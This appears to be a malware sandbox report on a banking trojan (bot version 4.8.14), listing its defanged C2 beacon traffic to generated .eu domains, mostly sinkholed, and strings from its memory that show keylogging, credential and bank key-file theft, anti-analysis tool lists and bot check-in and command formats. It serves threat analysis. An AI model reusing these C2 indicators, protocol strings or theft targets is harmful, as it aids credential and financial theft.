....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: xuxusujenes.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx/1.4.6 (Ubuntu)

Date: Tue, 13 Feb 2018 20:38:05 GMT

Content-Type: text/html

Content-Length: 579

Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx/1.4.
6 (Ubuntu)</center>..</body>..</html>..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->..<!-- a 
padding to disable MSIE and Chrome friendly error page -->..<!--
 a padding to disable MSIE and Chrome friendly error page -->..<
!-- a padding to disable MSIE and Chrome friendly error page -->..&
lt;!-- a padding to disable MSIE and Chrome friendly error page -->
..<!-- a padding to disable MSIE and Chrome friendly error page --&
gt;......


POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: xuxusujenes.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx/1.4.6 (Ubuntu)

Date: Tue, 13 Feb 2018 20:38:05 GMT

Content-Type: text/html

Content-Length: 579

Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx/1.4.
6 (Ubuntu)</center>..</body>..</html>..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->..<!-- a 
padding to disable MSIE and Chrome friendly error page -->..<!--
 a padding to disable MSIE and Chrome friendly error page -->..<
!-- a padding to disable MSIE and Chrome friendly error page -->..&
lt;!-- a padding to disable MSIE and Chrome friendly error page -->
..<!-- a padding to disable MSIE and Chrome friendly error page --&
gt;..HTTP/1.1 404 Not Found..Server: nginx/1.4.6 (Ubuntu)..Date: Tue, 
13 Feb 2018 20:38:05 GMT..Content-Type: text/html..Content-Length: 579
..Connection: keep-alive..<html>..<head><title>404 N
ot Found</title></head>..<body bgcolor="white">..<
;center><h1>404 Not Found</h1></center>..<hr&g
t;<center>nginx/1.4.6 (Ubuntu)</center>..</body>..&l
t;/html>..<!-- a padding to disable MSIE and Chrome friendly err
or page -->..<!-- a padding to disable MSIE and Chrome friendly 
error page -->..<!-- a padding to disable MSIE and Chrome friend
ly error page -->..<!-- a padding to disable MSIE and Chrome fri
endly error page -->..<!-- a padding to disable MSIE and Chrome 
friendly error page -->..<!-- a padding to disable MSIE and <<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qeqinuqypoq.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: diselahidaf.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:40 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: mavinifenam.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:40 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: nojejecebuw.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:43 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vojacikigep.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: cihunemyror.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: xukovoruput.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:26 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: cihunemyror.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: tucyguqaciq.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gacezobeqon.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:28 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: nojejecebuw.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:43 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lyvejujolec.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: mamixikusah.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Moved Temporarily

Date: Tue, 13 Feb 2018 20:38:25 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d618d78bdc4204204d5a2aa2922bf44b11518554305; expires=Wed, 13-Feb-19 20:38:25 GMT; path=/; domain=.mamixikusah.eu; HttpOnly

Location: hXXp://172.104.145.13:18001/in/pandora/

Server: cloudflare

CF-RAY: 3eca975bc03f8b94-KBP
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..HTTP/1.1 302 Moved Temporaril
y..Date: Tue, 13 Feb 2018 20:38:25 GMT..Content-Type: text/html..Trans
fer-Encoding: chunked..Connection: keep-alive..Set-Cookie: __cfduid=d6
18d78bdc4204204d5a2aa2922bf44b11518554305; expires=Wed, 13-Feb-19 20:3
8:25 GMT; path=/; domain=.mamixikusah.eu; HttpOnly..Location: hXXp://1
72.104.145.13:18001/in/pandora/..Server: cloudflare..CF-RAY: 3eca975bc
03f8b94-KBP..9a..<html>..<head><title>302 Found</
title></head>..<body bgcolor="white">..<center>&l
t;h1>302 Found</h1></center>..<hr><center>n
ginx</center>..</body>..</html>..0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qeqinuqypoq.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: foxivusozuc.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: tupazivenom.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lyruxyxaxaw.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: tupazivenom.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: tucyguqaciq.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: mavinifenam.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:40 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: xuqohyxeqak.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: jewuqyjywyv.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: marytymenok.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:06 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

The Trojan connects to the servers at the folowing location(s):

taskhost.exe_1940_rwx_01EF0000_000B4000:

.text

`.data

.reloc

`.rdata

@.data

<>http

PASSu98V

PASSu08V

FTPQ

12345678

password1

monkey

monkey1

password

Pname.key

\secrets.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

ollydbg.exe

dumpcap.exe

wireshark.exe

avp.exe

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

sysinfo.log

scr.jpg

minidump.bin

%d.%d.%d.%d

Ý %dh %dm

%s:%d

Software\Microsoft\Internet Explorer\TypedURLs

url%i

4.8.14

%dx%d@%d

%c%d:d

{Windows directory:

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Referer: hXXp://VVV.google.com

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/login.php

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

/search.php

Winmm.dll

Kernel32.dll

Gdi32.dll

ntdll.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

\firefox.exe

keygrab

u.jpg

IprivLibEx.dll

\\.\PhysicalDrive%u

/topic.php

keylog.txt

sniff.log

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

command=config&update_url=

&port=

command=load&url=

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

\chrome.exe

\svchost.exe

\opera.exe

\cbmain.ex

\iscc.exe

\clmain.exe

\wclnt.exe

internal_wutex_0xx

%s.dbf

%s.DBF

pop2://%s:%s@%s:%i

pop3://%s:%s@%s:%i

nntp://%s:%s@%s:%i

PTF://%s:%s@%s:%i

PTF://anonymous:

AUTHINFO PASS

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

login=

password=

pass_

ssleay32.dll

advapi32.dll

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.jpg

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

pass.txt

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

cert.pem

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

winmm.dll

1.2.5

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

%s\%s

#webcam

#webcam%d

RFB d.d

%s (%s)

d/d/d d:d

password check failed!

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

dbghelp.dll

PSAPI.DLL

NETAPI32.dll

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

WinExec

SetThreadExecutionState

GetWindowsDirectoryA

KERNEL32.dll

GetKeyboardState

MsgWaitForMultipleObjects

GetKeyboardLayoutList

GetAsyncKeyState

GetKeyboardLayout

MapVirtualKeyW

VkKeyScanW

VkKeyScanExW

keybd_event

EnumChildWindows

ActivateKeyboardLayout

SetKeyboardState

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegNotifyChangeKeyValue

RegDeleteKeyA

RegEnumKeyExA

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

gdiplus.dll

MSVCRT.dll

AVICAP32.dll

MSVFW32.dll

ShellExecuteW

GetProcessHeap

?456789:;<=

!"#$%&'()* ,-./0123

;3 #>6.&

'2, / 0&7!4-)1#

5`6C6Q6}6

;";,;6;<;_;{;

6&7-737<7|7

3"33393>3}3

;#;);/;=;

<"=3=9=>=}=

:(:-:8:=:

7#7)7/7=7

9&9,929@9

0!02090>0

>$>*>4>9>

Windows Explorer

mavast.com

ya.ru

serverkey.dat

\windows\

dntdll.dll

.NET CLR Networking_Perf_Library_Lock_PID_0

.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0

ASP.NET_2.0.50727_Perf_Library_Lock_PID_0

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings

iexplore.exe

HighMemoryEvent_x

MSCTF.Shared.MAPPING.x

MSCTF.Shared.EVENT.x

MSCTF.Shared.MUTEX.x

.Prev

.current

taskhost.exe_1940_rwx_02010000_000BA000:

.text

`.rdata

@.data

.reloc

<>http

PASSu98V

PASSu08V

FTPQ

Bve.Bv|

12345678

password1

monkey

monkey1

password

Pname.key

\secrets.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

ollydbg.exe

dumpcap.exe

wireshark.exe

avp.exe

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

sysinfo.log

scr.jpg

minidump.bin

%d.%d.%d.%d

Ý %dh %dm

%s:%d

Software\Microsoft\Internet Explorer\TypedURLs

url%i

4.8.14

%dx%d@%d

%c%d:d

{Windows directory:

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Referer: hXXp://VVV.google.com

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/login.php

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

/search.php

Winmm.dll

Kernel32.dll

Gdi32.dll

ntdll.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

\firefox.exe

keygrab

u.jpg

IprivLibEx.dll

\\.\PhysicalDrive%u

/topic.php

keylog.txt

sniff.log

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

command=config&update_url=

&port=

command=load&url=

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

\chrome.exe

\svchost.exe

\opera.exe

\cbmain.ex

\iscc.exe

\clmain.exe

\wclnt.exe

internal_wutex_0xx

%s.dbf

%s.DBF

pop2://%s:%s@%s:%i

pop3://%s:%s@%s:%i

nntp://%s:%s@%s:%i

PTF://%s:%s@%s:%i

PTF://anonymous:

AUTHINFO PASS

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

login=

password=

pass_

ssleay32.dll

advapi32.dll

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.jpg

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

pass.txt

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

